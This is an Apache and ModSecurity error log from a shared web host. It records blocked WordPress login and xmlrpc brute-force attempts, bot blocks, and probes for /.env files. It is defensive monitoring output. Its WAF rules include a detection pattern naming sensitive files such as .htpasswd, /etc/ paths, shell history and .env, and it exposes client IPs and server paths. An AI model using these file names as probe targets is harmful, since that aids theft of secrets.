[Tue May 26 16:55:20.904770 2026] [security2:error] [pid 839808:tid 839859] [remote 103.11.102.22:33350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWDIJqtwAfohijxAqhVjQABcDA"]
[Tue May 26 16:55:22.167521 2026] [security2:error] [pid 839808:tid 840006] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDIJqtwAfohijxAqhViQAAAUw"]
[Tue May 26 16:55:23.260795 2026] [security2:error] [pid 839808:tid 840029] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWDI5qtwAfohijxAqhVsQAAAWM"]
[Tue May 26 16:55:23.261227 2026] [security2:error] [pid 839808:tid 840025] [client 66.249.64.110:38963] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWDIpqtwAfohijxAqhVrAAAAV8"]
[Tue May 26 16:55:23.883659 2026] [security2:error] [pid 839808:tid 840038] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDIpqtwAfohijxAqhVogAAAWw"]
[Tue May 26 16:55:25.038135 2026] [security2:error] [pid 839808:tid 840067] [client 172.64.209.10:12715] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahWDJJqtwAfohijxAqhVxwAAAYk"]
[Tue May 26 16:55:25.117646 2026] [core:crit] [pid 839808:tid 840051] (13)Permission denied: [client 157.55.39.49:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:55:25.358801 2026] [security2:error] [pid 839808:tid 840005] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDI5qtwAfohijxAqhVwwAAAUs"]
[Tue May 26 16:55:25.795983 2026] [security2:error] [pid 839808:tid 840047] [client 117.198.37.168:63113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDJZqtwAfohijxAqhV5AAAAXU"]
[Tue May 26 16:55:25.796182 2026] [security2:error] [pid 839808:tid 840047] [client 117.198.37.168:63113] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDJZqtwAfohijxAqhV5AAAAXU"]
[Tue May 26 16:55:27.714720 2026] [security2:error] [pid 839808:tid 839999] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDJpqtwAfohijxAqhV9wAAAUU"]
[Tue May 26 16:55:28.791211 2026] [autoindex:error] [pid 839808:tid 840052] [client 47.76.166.185:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:55:29.479030 2026] [security2:error] [pid 839808:tid 839967] [client 113.180.37.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDKJqtwAfohijxAqhWEwAAASU"]
[Tue May 26 16:55:29.895228 2026] [security2:error] [pid 839808:tid 839997] [client 176.65.139.236:24686] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cloud.cicodev.org"] [uri "/.env"] [unique_id "ahWDKZqtwAfohijxAqhWQwAAAUM"]
[Tue May 26 16:55:29.903815 2026] [security2:error] [pid 839808:tid 839975] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDKJqtwAfohijxAqhWHgAAAS0"]
[Tue May 26 16:55:29.913975 2026] [security2:error] [pid 839808:tid 839999] [client 176.65.139.231:25888] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dev.cicodev.org"] [uri "/.env"] [unique_id "ahWDKZqtwAfohijxAqhWRAAAAUU"]
[Tue May 26 16:55:29.923902 2026] [security2:error] [pid 839808:tid 839993] [client 176.65.139.231:25886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mobile.cicodev.org"] [uri "/.env"] [unique_id "ahWDKZqtwAfohijxAqhWRQAAAT8"]
[Tue May 26 16:55:31.688823 2026] [security2:error] [pid 839808:tid 839958] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDKpqtwAfohijxAqhWSwAAARw"]
[Tue May 26 16:55:33.633109 2026] [security2:error] [pid 839808:tid 840054] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDLJqtwAfohijxAqhWbgAAAXw"]
[Tue May 26 16:55:34.206771 2026] [autoindex:error] [pid 839808:tid 839958] [client 152.136.23.159:40648] AH01276: Cannot serve directory /home1/dprlky8f/dprassurance.lk/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:55:35.356923 2026] [core:crit] [pid 839808:tid 840049] (13)Permission denied: [client 157.55.39.49:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:55:35.975338 2026] [security2:error] [pid 839808:tid 840032] [client 117.198.37.168:63426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDL5qtwAfohijxAqhWvwAAAWY"]
[Tue May 26 16:55:35.975510 2026] [security2:error] [pid 839808:tid 840032] [client 117.198.37.168:63426] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDL5qtwAfohijxAqhWvwAAAWY"]
[Tue May 26 16:55:36.076648 2026] [security2:error] [pid 839808:tid 839956] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDLZqtwAfohijxAqhWjwAAARo"]
[Tue May 26 16:55:37.266699 2026] [security2:error] [pid 839808:tid 839959] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDL5qtwAfohijxAqhWrwAAAR0"]
[Tue May 26 16:55:38.982479 2026] [security2:error] [pid 839808:tid 839962] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDMZqtwAfohijxAqhW2wAAASA"]
[Tue May 26 16:55:39.206615 2026] [security2:error] [pid 839808:tid 839944] [client 74.7.244.52:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWDMJqtwAfohijxAqhWxgAAAQ4"]
[Tue May 26 16:55:39.207645 2026] [security2:error] [pid 839808:tid 840037] [client 74.7.244.52:43250] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/robots.txt"] [unique_id "ahWDMJqtwAfohijxAqhWwwABa2s"]
[Tue May 26 16:55:40.631560 2026] [security2:error] [pid 839808:tid 839963] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDM5qtwAfohijxAqhXBAAAASE"]
[Tue May 26 16:55:41.970090 2026] [security2:error] [pid 839808:tid 839930] [remote 160.250.186.220:47500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWDNZqtwAfohijxAqhXLgABUXc"]
[Tue May 26 16:55:42.206947 2026] [security2:error] [pid 839808:tid 839981] [client 92.222.108.116:42960] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.wrapmachines.com"] [uri "/robots.txt"] [unique_id "ahWDNpqtwAfohijxAqhXNgAAATM"]
[Tue May 26 16:55:42.207095 2026] [security2:error] [pid 839808:tid 839981] [client 92.222.108.116:42960] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.wrapmachines.com"] [uri "/robots.txt"] [unique_id "ahWDNpqtwAfohijxAqhXNgAAATM"]
[Tue May 26 16:55:42.754393 2026] [security2:error] [pid 839808:tid 839993] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDNZqtwAfohijxAqhXJgAAAT8"]
[Tue May 26 16:55:43.606275 2026] [security2:error] [pid 839808:tid 840040] [client 51.222.168.203:39668] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.wrapmachines.com"] [uri "/"] [unique_id "ahWDN5qtwAfohijxAqhXVQAAAW4"]
[Tue May 26 16:55:43.606419 2026] [security2:error] [pid 839808:tid 840040] [client 51.222.168.203:39668] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.wrapmachines.com"] [uri "/"] [unique_id "ahWDN5qtwAfohijxAqhXVQAAAW4"]
[Tue May 26 16:55:44.461665 2026] [security2:error] [pid 839808:tid 839813] [remote 46.101.75.237:47346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWDOJqtwAfohijxAqhXZAABfQI"]
[Tue May 26 16:55:44.660732 2026] [security2:error] [pid 839808:tid 840036] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDN5qtwAfohijxAqhXSQAAAWo"]
[Tue May 26 16:55:46.914332 2026] [security2:error] [pid 839808:tid 839987] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDOZqtwAfohijxAqhXfwAAATk"]
[Tue May 26 16:55:48.082024 2026] [security2:error] [pid 839808:tid 839975] [client 54.37.118.77:51366] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "aastha-enterprises.com"] [uri "/robots.txt"] [unique_id "ahWDPJqtwAfohijxAqhXsQAAAS0"]
[Tue May 26 16:55:48.082137 2026] [security2:error] [pid 839808:tid 839975] [client 54.37.118.77:51366] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "aastha-enterprises.com"] [uri "/robots.txt"] [unique_id "ahWDPJqtwAfohijxAqhXsQAAAS0"]
[Tue May 26 16:55:48.172304 2026] [security2:error] [pid 839808:tid 840027] [client 117.198.37.168:63748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDPJqtwAfohijxAqhXsgAAAWE"]
[Tue May 26 16:55:48.172413 2026] [security2:error] [pid 839808:tid 840027] [client 117.198.37.168:63748] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDPJqtwAfohijxAqhXsgAAAWE"]
[Tue May 26 16:55:49.070901 2026] [security2:error] [pid 839808:tid 840011] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDO5qtwAfohijxAqhXqAAAAVE"]
[Tue May 26 16:55:49.642795 2026] [security2:error] [pid 839808:tid 840032] [client 142.44.220.147:27930] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "aastha-enterprises.com"] [uri "/"] [unique_id "ahWDPZqtwAfohijxAqhXzwAAAWY"]
[Tue May 26 16:55:49.642918 2026] [security2:error] [pid 839808:tid 840032] [client 142.44.220.147:27930] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "aastha-enterprises.com"] [uri "/"] [unique_id "ahWDPZqtwAfohijxAqhXzwAAAWY"]
[Tue May 26 16:55:50.315534 2026] [security2:error] [pid 839808:tid 839985] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDPJqtwAfohijxAqhXxQAAATc"]
[Tue May 26 16:55:53.010534 2026] [security2:error] [pid 839808:tid 840025] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDP5qtwAfohijxAqhYCwAAAV8"]
[Tue May 26 16:55:54.614165 2026] [security2:error] [pid 839808:tid 840059] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDQZqtwAfohijxAqhYJgAAAYE"]
[Tue May 26 16:55:55.986920 2026] [security2:error] [pid 839808:tid 839988] [client 85.208.96.193:23010] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/neon/day/2026-04-17/"] [unique_id "ahWDQ5qtwAfohijxAqhYWgAAATo"]
[Tue May 26 16:55:55.987067 2026] [security2:error] [pid 839808:tid 839988] [client 85.208.96.193:23010] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/neon/day/2026-04-17/"] [unique_id "ahWDQ5qtwAfohijxAqhYWgAAATo"]
[Tue May 26 16:55:56.510771 2026] [security2:error] [pid 839808:tid 840011] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDQ5qtwAfohijxAqhYTwAAAVE"]
[Tue May 26 16:55:56.865616 2026] [security2:error] [pid 839808:tid 839990] [client 117.198.37.168:64067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDRJqtwAfohijxAqhYagAAATw"]
[Tue May 26 16:55:56.865804 2026] [security2:error] [pid 839808:tid 839990] [client 117.198.37.168:64067] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDRJqtwAfohijxAqhYagAAATw"]
[Tue May 26 16:55:57.918528 2026] [security2:error] [pid 839808:tid 840048] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDRJqtwAfohijxAqhYawAAAXY"]
[Tue May 26 16:55:57.961446 2026] [security2:error] [pid 839808:tid 839978] [client 82.27.0.75:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDRJqtwAfohijxAqhYbgAAATA"]
[Tue May 26 16:56:00.222452 2026] [security2:error] [pid 839808:tid 839972] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDR5qtwAfohijxAqhYnAAAASo"]
[Tue May 26 16:56:02.157562 2026] [security2:error] [pid 839808:tid 839982] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDSZqtwAfohijxAqhYyAAAATQ"]
[Tue May 26 16:56:03.742489 2026] [security2:error] [pid 839808:tid 840057] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDSpqtwAfohijxAqhY5QAAAX8"]
[Tue May 26 16:56:04.575298 2026] [security2:error] [pid 839808:tid 839985] [client 138.229.100.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWDTJqtwAfohijxAqhZDgAAATc"], referer: https://www.anujtradingco.com/
[Tue May 26 16:56:05.915349 2026] [security2:error] [pid 839808:tid 839975] [client 138.229.100.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWDTZqtwAfohijxAqhZRwAAAS0"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1239681&moderation-hash=56ffcf4ca23706c5a7783305a251802f
[Tue May 26 16:56:06.043847 2026] [security2:error] [pid 839808:tid 840000] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDTJqtwAfohijxAqhZIwAAAUY"]
[Tue May 26 16:56:07.178292 2026] [security2:error] [pid 839808:tid 840008] [client 117.198.37.168:64391] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDT5qtwAfohijxAqhZZQAAAU4"]
[Tue May 26 16:56:07.178411 2026] [security2:error] [pid 839808:tid 840008] [client 117.198.37.168:64391] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDT5qtwAfohijxAqhZZQAAAU4"]
[Tue May 26 16:56:08.127348 2026] [security2:error] [pid 839808:tid 839943] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDT5qtwAfohijxAqhZXwAAAQ0"]
[Tue May 26 16:56:09.400905 2026] [security2:error] [pid 839808:tid 839951] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDUJqtwAfohijxAqhZewAAARU"]
